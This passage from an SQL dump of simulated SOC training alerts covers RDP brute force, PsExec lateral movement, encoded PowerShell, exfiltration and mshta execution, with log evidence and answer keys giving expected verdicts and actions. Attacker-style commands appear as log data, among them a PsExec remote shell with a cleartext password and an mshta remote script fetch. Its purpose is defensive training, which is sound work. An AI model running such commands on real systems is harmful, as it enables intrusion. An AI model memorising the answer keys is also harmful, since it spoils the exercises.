2]\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:29:22.343Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER [Repeated event count: 3]\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:28:22.343Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER [Repeated event count: 4]\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"}],\"query\":\"index=main source=\\\"WinEventLog:Security\\\" EventCode=4625 | head 100\"}}', 0),
(697, 'ALPHV Ransomware Reconnaissance Activity Detected', 'medium', 'Splunk', 'Suspicious use of PsExec detected, indicating potential lateral movement associated with ALPHV ransomware.', 'Lateral Movement', 'T1021.002', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.12\",\"dst_ip\":\"10.0.0.23\",\"username\":\"svc_admin\",\"hostname\":\"CORP-SERVER-01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\"}', '2026-01-11 13:49:48', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP involved in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP involved in lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec used to open a remote shell on 10.0.0.23, with the admin password supplied in cleartext on the command line\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec is commonly used for lateral movement, especially in ransomware operations. The command line passes the admin password in cleartext (-p), so that credential is exposed in process logs and must be reset. Also verify whether svc_admin is expected to run PsExec from CORP-SERVER-01 at 02:30, and check 10.0.0.23 for the remote service PsExec installs and any follow-on execution.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 
cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.344Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.12\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"svc_admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(698, 'False Positive: Legitimate User Activity Mistaken for Command Injection', 'low', 'IDS', 'An alert was triggered for a suspected command injection, but the activity was identified as a legitimate administrative task.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T05:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.20\",\"username\":\"admin\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"ping -c 4 8.8.8.8 && echo test\",\"url\":\"http://192.168.2.20/admin/execute\"}', '2026-01-10 23:39:43', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of internal admin machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Web server internal IP\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"ping -c 4 8.8.8.8 && echo test\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Connectivity check submitted by the admin account to the administrative execute endpoint; the && command chaining is what matched the command-injection signature\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Upon review, the request came from the internal admin workstation (192.168.2.15) under the admin account to an intended administrative endpoint, and the command is a routine connectivity check rather than an injection attempt. Before closing, confirm that /admin/execute requires authentication and is not reachable from outside the network, and that the admin session was genuinely the administrator: an endpoint that executes submitted shell input is a high-value target even when this particular request is benign.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"200\",\"message\":\"POST /admin/execute HTTP/1.1 - 200 OK - IP: 192.168.2.15 - user: admin - body: ping -c 4 8.8.8.8 && echo test\",\"host\":\"WEB-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"200\",\"message\":\"POST /admin/execute HTTP/1.1 - 200 OK - IP: 192.168.2.15 - user: admin - body: ping -c 4 8.8.8.8 && echo test [Repeated event count: 1]\",\"host\":\"WEB-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"200\",\"message\":\"POST /admin/execute HTTP/1.1 - 200 OK - IP: 192.168.2.15 - user: admin - body: ping -c 4 8.8.8.8 && echo test [Repeated event count: 2]\",\"host\":\"WEB-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"200\",\"message\":\"POST /admin/execute HTTP/1.1 - 200 OK - IP: 192.168.2.15 - user: admin - body: ping -c 4 8.8.8.8 && echo test [Repeated event count: 3]\",\"host\":\"WEB-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"200\",\"message\":\"POST /admin/execute HTTP/1.1 - 200 OK - IP: 192.168.2.15 - user: admin - body: ping -c 4 8.8.8.8 && echo test [Repeated event count: 4]\",\"host\":\"WEB-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(699, 'Suspicious PowerShell Execution with Encoded Commands', 'high', 'CrowdStrike', 'A PowerShell process was detected executing with encoded commands on an internal host. This is frequently used in obfuscation techniques by attackers.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:42:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.20\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"file_hash\":\"3b7b3c2a5c6a4f7b8b8b3a2c3b7c6a4f\"}', '2026-01-10 01:55:09', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Base64 -enc PowerShell is a common obfuscation technique; decode the argument (base64 of a UTF-16LE string) to see the actual command before deciding.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b7b3c2a5c6a4f7b8b8b3a2c3b7c6a4f\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"This hash is associated with potentially unwanted software.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell is not malicious on its own (some management tooling uses -enc), so the verdict rests on the decoded command, on a High-integrity powershell.exe spawned from a Medium-integrity explorer.exe under the user jdoe, and on the established outbound connection from that process to 203.0.113.55 on port 443. Decode the command and pivot on the hash before acting.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"DESKTOP-1A2B3C\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(700, 'Unauthorized Access Attempt via RDP', 'critical', 'Splunk', 'Multiple failed RDP login attempts detected from an external IP address, suggesting a possible brute force attack.', 'Credential Attack', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T13:22:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"RDP-SERVER\",\"failed_attempts\":25}', '2026-01-10 08:37:56', '2026-02-16 18:04:57', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed login attempts from a known malicious IP indicates a brute force attack. Before closing, confirm that no logon from 203.0.113.45 succeeded after the 25 failures; a success would make this a compromise rather than an attempt. Block the source, reset the admin account, and raise the fact that RDP on 192.168.1.10 is reachable from the internet as a finding in its own right.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.346Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.346Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER [Repeated event count: 1]\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.346Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER [Repeated event count: 2]\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.346Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER [Repeated event count: 3]\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.346Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER [Repeated event count: 4]\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"WinEventLog:Security\\\" EventCode=4625 | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(701, 'Suspicious Network Activity Detected', 'medium', 'Firewall', 'A large volume of data was transferred from an internal server to an unknown external IP, potentially indicating data exfiltration.', 'Data Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T16:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"198.51.100.75\",\"bytes_transferred\":10485760,\"hostname\":\"FILE-SERVER\"}', '2026-01-11 09:55:46', '2026-02-18 09:06:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of FILE-SERVER.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Roughly 10 MB (10485760 bytes) sent from FILE-SERVER to an external IP with an exfiltration reputation is a true positive. Before isolating a production file server, identify the process and account that opened the connection and compare the volume with the host baseline, so that the isolation is justified and the scope (which shares and files were read) can be established for notification decisions.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"16:30:44\",\"src\":\"192.168.1.25\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"16:30:45\",\"src\":\"192.168.1.25\",\"dst\":\"198.51.100.75\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(702, 'False Positive: Legitimate Script Execution Detected', 'low', 'Wazuh', 'A legitimate administrative script was detected using mshta.exe, which can sometimes be misidentified as malicious.', 'Lateral Movement', 'T1218.005', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"\",\"username\":\"admin_user\",\"hostname\":\"ADMIN-SERVER\",\"command_line\":\"mshta.exe http://internal.domain.com/admin_script.hta\"}', '2026-01-10 21:43:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta.exe http://internal.domain.com/admin_script.hta\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"internal.domain.com is an internal administrative host that external scanners cannot reach; the clean verdict rests on the internal allow-list, not on a third-party scan.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The HTA was fetched from an internal host and run by admin_user on ADMIN-SERVER, consistent with an approved administrative script. Before closing, confirm that internal.domain.com resolved to the expected internal server, that the content or hash of admin_script.hta matches the approved version, and that mshta.exe is an accepted tool for this task: mshta is a common living-off-the-land binary, and because the script is retrieved over plain HTTP it could be swapped by anyone on the network path or through DNS manipulation.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Sysmon EID 1\",\"message\":\"Process created: mshta.exe http://internal.domain.com/admin_script.hta (user: admin_user, host: ADMIN-SERVER)\",\"host\":\"ADMIN-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Sysmon EID 1\",\"message\":\"Process created: mshta.exe http://internal.domain.com/admin_script.hta (user: admin_user, host: ADMIN-SERVER) [Repeated event count: 1]\",\"host\":\"ADMIN-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Sysmon EID 1\",\"message\":\"Process created: mshta.exe http://internal.domain.com/admin_script.hta (user: admin_user, host: ADMIN-SERVER) [Repeated event count: 2]\",\"host\":\"ADMIN-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Sysmon EID 1\",\"message\":\"Process created: mshta.exe http://internal.domain.com/admin_script.hta (user: admin_user, host: ADMIN-SERVER) [Repeated event count: 3]\",\"host\":\"ADMIN-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Sysmon EID 1\",\"message\":\"Process created: mshta.exe http://internal.domain.com/admin_script.hta (user: admin_user, host: ADMIN-SERVER) [Repeated event count: 4]\",\"host\":\"ADMIN-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
